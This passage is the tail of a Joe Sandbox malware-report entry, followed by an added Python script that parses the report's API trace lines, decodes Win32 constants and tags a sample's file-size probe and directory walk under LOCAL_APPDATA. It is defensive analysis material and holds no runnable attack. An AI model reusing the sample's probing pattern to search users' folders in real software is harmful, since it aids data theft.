                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: ffca91118f15e95cbfc399b050719599fcdf8abd86542d9a75fccf716913212b
                                        • Instruction ID: 8483b4c5cc54fd85c64573845cdcee9cee95de24b8664390316d333e427ddb08
                                        • Opcode Fuzzy Hash: ffca91118f15e95cbfc399b050719599fcdf8abd86542d9a75fccf716913212b
                                        • Instruction Fuzzy Hash: 4121B67A900208A7CB54FBB0FC42EED733C9B65301F4045A8B65697192EF70AAC88B95
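The two function blocks above (the CreateFileA / GetFileSizeEx / CloseHandle function and the SHGetFolderPathA / lstrcat / FindFirstFileA function) are the kind of API trace an analyst decodes by hand: which access and disposition CreateFileA was called with, which CSIDL folder SHGetFolderPathA resolved, and whether a file was only measured or actually read. The script below is an added example, not part of the Joe Sandbox report and not code from the sample; it parses the report's "• API.MODULE(args), ref: ADDR" lines (the sample input is copied from the two blocks above), decodes the standard Win32 constants (GENERIC_READ, OPEN_EXISTING, FILE_SHARE_*, CSIDL values), and applies a few heuristic tags whose names and thresholds are my own choice, not the report's.

```python
"""Parse Joe Sandbox per-function API trace lines and decode the Win32 constants in them.

Added example for triage of reports like this one; it is not Joe Sandbox code and not
code from the analysed sample. Tag names in classify() are this example's own heuristics.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample input: the trace lines of two function blocks, copied from the report.
SAMPLE_SIZE_PROBE = """
• CreateFileA.KERNEL32(00193D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00193D3E,?), ref: 0019948C
• GetFileSizeEx.KERNEL32(000000FF,00193D3E), ref: 001994A9
• CloseHandle.KERNEL32(000000FF), ref: 001994B7
"""

SAMPLE_DIR_WALK = """
  • Part of subcall function 00198F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00198F9B
• lstrcat.KERNEL32(?,00000000), ref: 001951CA
• lstrcat.KERNEL32(?,001A1058), ref: 001951E7
  • Part of subcall function 00194B60: wsprintfA.USER32 ref: 00194B7C
  • Part of subcall function 00194B60: FindFirstFileA.KERNEL32(?,?), ref: 00194B93
  • Part of subcall function 00194B60: StrCmpCA.SHLWAPI(?,001A0FC4), ref: 00194BC1
  • Part of subcall function 00194B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00194DCD
  • Part of subcall function 00194B60: FindClose.KERNEL32(000000FF), ref: 00194DE2
"""

# One trace line: optional "Part of subcall function ADDR:" prefix, API.MODULE, optional
# parenthesised argument list ("?" marks a value the plugin could not resolve), "ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Standard Win32 constants (documented values, not taken from the report).
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
CSIDL = {0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA",
         0x1C: "CSIDL_LOCAL_APPDATA", 0x26: "CSIDL_PROGRAM_FILES"}


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]   # resolved hex values as int, None for "?"
    ref: int                    # call-site address
    subcall: Optional[int]      # callee address when the line is "Part of subcall function"


def parse_trace(text: str) -> List[Call]:
    """Turn the report's trace lines into Call records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [None if a.strip() == "?" else int(a, 16)
                for a in raw.split(",") if a.strip()]
        sub = m.group("sub")
        calls.append(Call(m.group("api"), m.group("mod"), args,
                          int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def decode_createfile(call: Call) -> dict:
    """Name the access, share and disposition arguments of a CreateFileA/W call."""
    assert call.api.startswith("CreateFile")
    access, share, disp = call.args[1], call.args[2], call.args[4]
    return {
        "access": [n for b, n in ACCESS.items() if access and access & b],
        "share": [n for b, n in SHARE.items() if share and share & b],
        "disposition": DISPOSITION.get(disp, hex(disp) if disp is not None else "?"),
    }


def classify(calls: List[Call]) -> Set[str]:
    """Heuristic tags (this example's own naming) for the call patterns seen in the report."""
    names = [c.api for c in calls]
    tags = set()
    # File opened and measured but never read inside this function.
    if "CreateFileA" in names and "GetFileSizeEx" in names \
            and not any(n.startswith("ReadFile") for n in names):
        tags.add("size-probe-without-read")
    # FindFirstFile/FindNextFile pair means the function iterates a directory.
    if "FindFirstFileA" in names and "FindNextFileA" in names:
        tags.add("directory-walk")
    # Record which known folder the path being built is rooted in.
    for c in calls:
        if c.api == "SHGetFolderPathA" and len(c.args) > 1 and c.args[1] in CSIDL:
            tags.add("path-under-" + CSIDL[c.args[1]])
    return tags


if __name__ == "__main__":
    for label, text in (("size probe", SAMPLE_SIZE_PROBE), ("dir walk", SAMPLE_DIR_WALK)):
        calls = parse_trace(text)
        print(label, [c.api for c in calls], sorted(classify(calls)))
        if calls and calls[0].api == "CreateFileA":
            print("  CreateFileA:", decode_createfile(calls[0]))
```

Run against the first block, the script reports that the file is opened GENERIC_READ / OPEN_EXISTING with read-and-write sharing and only its size is queried; against the last block it reports a directory walk rooted under CSIDL_LOCAL_APPDATA (0x1C). The "000000FF" handle values are how the plugin prints arguments it could not resolve to a constant, so the parser keeps them as plain integers rather than assigning them meaning.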